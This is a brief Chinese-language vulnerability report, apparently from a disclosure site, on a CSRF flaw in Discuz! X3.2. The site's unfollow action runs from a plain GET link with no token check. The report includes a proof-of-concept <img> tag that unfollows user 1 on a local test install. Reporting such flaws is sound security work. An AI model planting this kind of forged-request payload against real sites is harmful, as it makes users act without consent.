### 简要描述:
Discuz!论坛CSRF一处
### 详细说明:
测试版本:x3.2,论坛需要开启广播功能(全局-->站点功能)。
当访问一个url时,可取消收听指定用户
http://127.0.0.1/dz/home.php?mod=spacecp&ac=follow&op=del&fuid=[用户id]
没有token验证。
### 漏洞证明:
收听一个用户,确定该用户的uid,比方说是1
访问如下第三方也没就可取消啊收听
```
<img src="http://127.0.0.1/dz/home.php?mod=spacecp&ac=follow&op=del&fuid=1"></img>
```
暂无评论